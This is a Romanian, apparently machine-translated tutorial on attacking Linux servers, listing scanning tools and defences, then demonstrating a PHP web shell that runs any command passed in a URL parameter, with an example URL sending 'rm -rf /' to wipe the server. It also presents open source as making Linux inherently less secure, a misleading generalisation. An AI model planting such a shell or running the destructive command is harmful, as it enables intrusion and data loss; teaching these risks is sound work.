Hacking Linux OS: Hacking cu Ubuntu (Tutorial de comenzi)
Linux este cel mai utilizat sistem de operare pentru servere, în special pentru serverele web. Este open source; aceasta înseamnă că oricine poate avea acces la codul sursă. Acest lucru îl face mai puțin sigur în comparație cu alte sisteme de operare, deoarece atacatorii pot studia codul sursă pentru a găsi vulnerabilități. Linux for Hackers se referă la exploatarea acestor vulnerabilități pentru a obține acces neautorizat la un sistem.
În acest articol, vă vom prezenta ce este Linux, vulnerabilitățile sale de securitate, cu care piratare Ubuntu și contramăsurile pe care le poți pune în aplicare.
Notă rapidă pe Linux
Linux este un sistem de operare open source. Există multe distribuții de sisteme de operare bazate pe Linux, cum ar fi Redhat, Fedora și Ubuntu, etc. Spre deosebire de alte sisteme de operare, Linux este mai puțin sigur când vine vorba de securitate. Acest lucru se datorează faptului că codul sursă este disponibil gratuit, deci este ușor să îl studiezi pentru vulnerabilități și să le exploatezi în comparație cu alte sisteme de operare care nu sunt open source. Linux poate fi folosit ca sistem de operare server, desktop, tabletă sau dispozitiv mobil.
Programele Linux pot fi operate fie folosind GUI, fie comenzi. Comenzile Linux pentru Kali Linux hacking-urile sunt mai eficiente și mai eficiente în comparație cu utilizarea GUI. Din acest motiv, vă ajută să cunoașteți comenzile Linux de bază pentru hacking.
Consultați aceste tutoriale https://www.guru99.com/unix-linux-tutorial.html despre cum să începeți Kali Linux hack-uri.
Instrumente de hacking Linux
- Nessus– acest instrument poate fi folosit pentru Ubuntu hack, setări de configurare de scanare, patch-uri și rețele etc. poate fi găsit la https://www.tenable.com/products/nessus
- NMap. Acest instrument poate fi folosit pentru a monitoriza gazdele care rulează pe server și serviciile pe care le utilizează. Poate fi folosit și pentru a scana porturi. Poate fi găsit la https://nmap.org/
- SARA – SARA este acronimul pentru Security Auditor's Research Assistant. După cum sugerează și numele, acest instrument poate fi utilizat pentru a audita rețelele împotriva amenințărilor precum Injecție SQL, XSS etc. poate fi găsit la http://www-arc.com/sara/sara.html
Lista de mai sus nu este exhaustivă; vă oferă o idee despre instrumentele disponibile pentru Ubuntu piratarea și piratarea sistemelor Linux.
Cum să preveniți hackurile Linux
Linux Hacking profită de vulnerabilitățile din sistemul de operare. O organizație poate adopta următoarea politică pentru a se proteja împotriva unor astfel de atacuri.
- Managementul patch-urilor– corecțiile remediază erorile pe care atacatorii le exploatează pentru a compromite un sistem. O bună politică de gestionare a corecțiilor vă va asigura că aplicați în mod constant corecțiile relevante sistemului dumneavoastră.
- Configurare corectă a sistemului de operare– alte exploit-uri profită de punctele slabe din configurația serverului. Numele de utilizator și demonii inactivi ar trebui să fie dezactivate. Setările implicite, cum ar fi parolele comune pentru aplicație, numele de utilizator implicite și unele numere de porturi ar trebui modificate.
- Sistem de detectare a intruziunilor– astfel de instrumente pot fi folosite pentru a detecta accesul neautorizat la sistem. Unele instrumente au capacitatea de a detecta și de a preveni astfel de atacuri.
Activitate de hacking: Hack a Ubuntu Sistem Linux folosind PHP
În acest scenariu practic, vom învăța cum să piratam Ubuntu și vă vom oferi informații de bază despre cum puteți utiliza PHP pentru a compromite un Linux. Nu vom viza nicio victimă. Dacă doriți să îl încercați, puteți instala LAMPP pe mașina dvs. locală.
PHP vine cu două funcții care pot fi folosite pentru a executa comenzi de hacking Linux. Are funcțiile exec() și shell_exec(). Funcția exec() returnează ultima linie a comenzii, în timp ce shell_exec() returnează întregul rezultat al comenzii ca șir.
În scopuri demonstrative, să presupunem că managerii atacatorilor încarcă următorul fișier pe un server web.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
AICI,
Scriptul de mai sus primește comanda de la variabila GET numită cmd. Comanda este executată folosind shell_exec() și rezultatele sunt returnate în browser.
Codul de mai sus poate fi exploatat folosind următorul URL
http://localhost/cp/konsole.php?cmd=ls%20-l
AICI,
- „…konsole.php?cmd=ls%20-l”atribuie valoarea ls –l variabilei cmd.
Comanda în Ubuntu pentru hacking împotriva serverului va fi executat ca
shell_exec('ls -l') ;
Executarea codului de mai sus pe un server web dă rezultate similare cu următoarele.
Comanda de mai sus afișează pur și simplu fișierele din directorul curent și permisiunile
Să presupunem că atacatorul trece următoarea comandă
rm -rf /
AICI,
- „rm” elimină fișierele
- „rf” face ca comanda rm să ruleze într-un mod recursiv. Ștergerea tuturor folderelor și fișierelor
- „/” indică comenzii să înceapă ștergerea fișierelor din directorul rădăcină
Adresa URL de atac ar arăta cam așa
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Rezumat
- Linux este un sistem de operare popular pentru servere, desktop-uri, tablete și dispozitive mobile.
- Linux este open source, iar codul sursă poate fi obținut de oricine. Acest lucru facilitează identificarea vulnerabilităților. Este unul dintre cele mai bune sisteme de operare pentru hackeri.
- Comenzi de hacking de bază și de rețea în Ubuntu sunt valoroase pentru hackerii Linux.
- Vulnerabilitățile sunt o slăbiciune care poate fi exploatată pentru a compromite un sistem.
- O bună securitate poate ajuta la protejarea unui sistem de a fi compromis de un atacator.